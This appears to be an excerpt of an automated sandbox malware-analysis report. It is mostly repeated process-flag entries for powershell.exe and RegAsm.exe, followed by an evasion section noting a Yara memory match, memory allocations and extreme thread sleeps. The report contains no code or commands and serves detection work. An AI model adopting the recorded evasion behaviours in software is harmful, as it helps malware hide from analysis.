                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX

                        Malware Analysis System Evasion

                        barindex
                        Source: Yara matchFile source: 00000006.00000002.2195084850.000001F542643000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6388, type: MEMORYSTR
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: C20000 memory reserve | memory write watch
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 2890000 memory reserve | memory write watch
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 4890000 memory reserve | memory write watch
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 1750000 memory reserve | memory write watch
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 3120000 memory reserve | memory write watch
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 5120000 memory reserve | memory write watch
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: FB0000 memory reserve | memory write watch
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 2B00000 memory reserve | memory write watch
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 2A10000 memory reserve | memory write watch
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1565Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 947Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3349Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6434Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7154Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1798Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6961Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1598Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1296Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 401Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWindow / User API: threadDelayed 2340
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWindow / User API: threadDelayed 3063
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWindow / User API: threadDelayed 3711
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWindow / User API: foregroundWindowGot 1683
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 838
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 680
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3692Thread sleep time: -922337203685477s >= -30000sJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6484Thread sleep count: 3349 > 30Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6476Thread sleep count: 6434 > 30Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5988Thread sleep time: -16602069666338586s >= -30000sJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1200Thread sleep count: 7154 > 30Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3176Thread sleep count: 1798 > 30Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6332Thread sleep time: -7378697629483816s >= -30000sJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6556Thread sleep time: -922337203685477s >= -30000sJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 380Thread sleep count: 6961 > 30Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6104Thread sleep count: 1598 > 30Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4288Thread sleep time: -9223372036854770s >= -30000sJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3224Thread sleep time: -922337203685477s >= -30000sJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6464Thread sleep count: 1296 > 30Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1784Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4464Thread sleep count: 35 > 30Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2820Thread sleep time: -922337203685477s >= -30000sJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5296Thread sleep count: 401 > 30Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4072Thread sleep count: 67 > 30Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3524Thread sleep time: -30000s >= -30000sJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5548Thread sleep time: -922337203685477s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7216Thread sleep time: -2340000s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7216Thread sleep time: -3711000s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7508Thread sleep count: 838 > 30
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7504Thread sleep count: 251 > 30
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7524Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7564Thread sleep time: -922337203685477s >= -30000s
